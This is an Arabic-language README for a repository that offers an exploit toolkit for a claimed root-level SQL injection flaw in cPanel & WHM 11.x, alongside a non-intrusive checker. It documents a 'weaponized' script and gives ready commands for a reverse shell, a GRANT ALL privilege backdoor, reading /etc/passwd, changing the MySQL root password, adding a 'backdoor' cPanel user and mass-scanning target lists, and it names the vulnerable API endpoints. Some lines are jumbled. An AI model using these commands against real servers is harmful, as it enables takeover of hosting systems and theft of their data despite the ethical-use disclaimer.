
👾 CVE-2026-58048 – مجموعة أدوات تنفيذ SQL بصلاحيات الجذر في cPanel (CVSS 9.4) | مجموعة أدوات متكاملة للفريقين الأحمر والأزرق لإصدارات cPanel & WHM 11.x غير المُرقّعة. أداتان: الفاحص الآمن (التدقيق/إعداد التقارير)، والأداة المسلّحة (reverse shell، الاستمرارية، UDF RCE، النشر، قراءة/كتابة الملفات، عمليات قاعدة البيانات، الفحص الشامل). مع Python. 🦾 استخدمها بأخلاقية، والتزم بالقانون <3

⚠️ للاستخدام الأخلاقي فقط – اختبار أمني مصرح به
يوفر هذا المستودع أدوات لمتخصصي الأمن المصرح لهم، والفرق الزرقاء، ومختبري الاختراق فقط.
الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني بموجب CFAA (الولايات المتحدة)، وقانون إساءة استخدام الحاسوب (المملكة المتحدة)، وTCK 243/244 (تركيا)، وقوانين مماثلة في جميع أنحاء العالم.
CVE‑2026‑58048 هي ثغرة حقن SQL حرجة في إصدارات cPanel & WHM 11.x تسمح لمستخدم cPanel موثّق بتنفيذ أوامر SQL عشوائية بصلاحيات MySQL root عبر وظيفة إعادة تسمية قاعدة البيانات.
ANSI_QUOTES، مما يغيّر سلوك التحليل.11.137.1.6| الأداة | الغرض | المستخدم المستهدف |
|---|---|---|
exploit.py | مجموعة أدوات مسلّحة كاملة مع reverse shell، والاستمرارية، وUDF RCE، وقراءة/كتابة الملفات، وعمليات قاعدة البيانات، ودعم البروكسي، والمسح الجماعي. | الفرق الحمراء / مختبري الاختراق المصرح لهم |
git clone https://github.com/tc4dy/CVE-2026-58048-PoC-Exploit
cd CVE-2026-58048
pip install -r requirements.txt
requests
urllib3
colorama
pymysql
exploit.pysafecheck.pyيستخدم الاستغلال نقاط نهاية cPanel UAPI التالية:
يُقدَّم هذا البرنامج لأغراض تعليمية واختبار أمني مصرح به فقط.
safecheck.py| فاحص ثغرات غير تدخّلي يكتشف إصدار cPanel ويقيّم المخاطر دون تنفيذ أي حمولة خبيثة. يُنشئ تقارير مفصّلة. |
| الفرق الزرقاء / مدقّقي الأمن |
| الميزة | exploit.py | safecheck.py |
|---|
| اكتشاف الثغرة | ✅ | ✅ |
| اكتشاف الإصدار | ✅ | ✅ |
| حقن SQL بصلاحيات MySQL root | ✅ | ❌ |
| Reverse shell | ✅ | ❌ |
| الاستمرارية (إنشاء مستخدم cPanel) | ✅ | ❌ |
| UDF RCE (تنفيذ الأوامر) | ✅ | ❌ |
| قراءة/كتابة الملفات | ✅ | ❌ |
| عمليات قاعدة البيانات (أي SQL) | ✅ | ❌ |
| دعم البروكسي | ✅ | ✅ |
| المسح الجماعي (متعدد الخيوط) | ✅ | ❌ |
| صدفة تفاعلية | ✅ | ❌ |
| وضع غير تدخّلي (آمن) | ❌ | ✅ |
| وضع Verbose/Debug | ✅ | ✅ |
| التحكم في التحقق من SSL | ✅ | ✅ |
| User‑Agent مخصص | ✅ | ✅ |
| تأخير الطلبات / إعادة المحاولات | ✅ | ❌ |
| إخراج JSON / تقرير | ✅ | ✅ |
| فحص إمكانية الوصول إلى نقطة النهاية | ❌ | ✅ |
| اكتشاف تسرب وضع SQL | ❌ | ✅ |
| السيناريو | الأداة الموصى بها |
|---|
| الفريق الأزرق – التحقق مما إذا كان تثبيت cPanel الخاص بك معرّضاً للثغرة | safecheck.py |
| التدقيق الأمني – تقييم ثغرات غير تدخّلي | safecheck.py |
| الفريق الأحمر – اختبار اختراق مصرح به مع استغلال كامل | exploit.py |
| Bug Bounty – اختبار الإفصاح المسؤول | safecheck.py |
| المسح الجماعي – فحص أهداف متعددة بحثاً عن الثغرة | exploit.py (الكشف فقط) |
| الاستجابة للحوادث – التحقق مما إذا كانت الأنظمة مخترقة | safecheck.py |
| المعامل | الوصف |
|---|
-t, --target | عنوان URL المستهدف لـ cPanel (مثال: https://cpanel.example.com:2083) |
-l, --target-file | ملف يحتوي على قائمة الأهداف (واحد في كل سطر) للمسح الجماعي |
-u, --mysql-user | اسم مستخدم cPanel/MySQL |
-P, --mysql-pass | كلمة مرور cPanel/MySQL |
--mysql-port | منفذ MySQL (الافتراضي: 3306) |
-p, --port | تجاوز منفذ cPanel (الافتراضي من URL أو 2083) |
--threads | عدد الخيوط للأهداف المتعددة (الافتراضي: 10) |
-o, --output | حفظ النتائج في ملف (هدف واحد) |
--log | ملف سجل للإخراج المفصّل |
-v, --verbose | إخراج مفصّل |
--proxy | بروكسي HTTP/HTTPS (مثال: http://127.0.0.1:8080) |
-ua, --user-agent | User‑Agent مخصص |
--no-keep-alive | عدم إبقاء الجلسة نشطة |
--delay | التأخير بين الطلبات (الافتراضي: 2.0s) |
--max-retries | الحد الأقصى لإعادة المحاولات (الافتراضي: 3) |
--ssl-verify | التحقق من شهادات SSL |
--cmd | الأمر المراد تنفيذه (بادئة sql: أو udf: للتحديد) |
--inject | SQL مخصص للحقن (يتجاوز الإجراءات الأخرى) |
--reverse-shell | IP:PORT للـ reverse shell (يستخدم UDF) |
--passwd | تغيير كلمة مرور MySQL root |
--adduser | إنشاء مستخدم cPanel (USER DOMAIN PASSWORD) |
--read | قراءة ملف عبر LOAD_FILE |
-i, --interactive | صدفة تفاعلية بعد الاستغلال |
--verify | التحقق من نجاح الاستغلال بمحاولة تسجيل الدخول إلى MySQL |
--ping | فحص الهدف قبل الاستغلال |
| المعامل | الوصف |
|---|
-t, --target | عنوان URL المستهدف لـ cPanel (مثال: https://cpanel.example.com:2083) |
-v, --verbose | إخراج مفصّل |
--proxy | بروكسي HTTP/HTTPS (مثال: http://127.0.0.1:8080) |
-ua, --user-agent | User‑Agent مخصص |
--ssl-verify | التحقق من شهادات SSL |
--timeout | مهلة الطلب بالثواني (الافتراضي: 10) |
--log | حفظ التقرير في ملف |
--json | إخراج النتائج بصيغة JSON |
| # | السيناريو | الأمر |
|---|
| 1 | فحص سريع للثغرة | python safecheck.py -t https://cpanel.example.com:2083 |
| 2 | فحص مفصّل مع تقرير | python safecheck.py -t https://cpanel.example.com:2083 --log report.txt --json -v |
| 3 | Reverse shell | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444 |
| 4 | تنفيذ SQL مخصص (root) | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --inject "GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%' IDENTIFIED BY 'pwned'" |
| 5 | قراءة ملف حساس | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd |
| 6 | تغيير كلمة مرور MySQL root | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123 |
| 7 | إنشاء مستخدم cPanel جديد (الاستمرارية) | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123 |
| 8 | صدفة تفاعلية بعد الاستغلال | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i |
| 9 | المسح الجماعي من ملف | python exploit.py -l targets.txt -u user -P pass --threads 20 --output results.json |
| 10 | استخدام بروكسي وUser‑Agent مخصص | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 -ua "Mozilla/5.0 (X11; Linux x86_64)" |
| نقطة النهاية | الغرض |
|---|
/execute/Mysql/create_database | إنشاء قاعدة بيانات مؤقتة |
/execute/Mysql/delete_database | تنظيف قواعد البيانات المُنشأة |
/execute/Mysql/rename_database | نقطة النهاية المعرّضة للثغرة – تُفعّل حقن SQL |
/execute/Version/get_version | المصادقة والتحقق من الإصدار |
/execute/UserManager/create_user | إنشاء مستخدم cPanel جديد (الاستمرارية) |
/execute/UserManager/list_users | سرد المستخدمين الحاليين |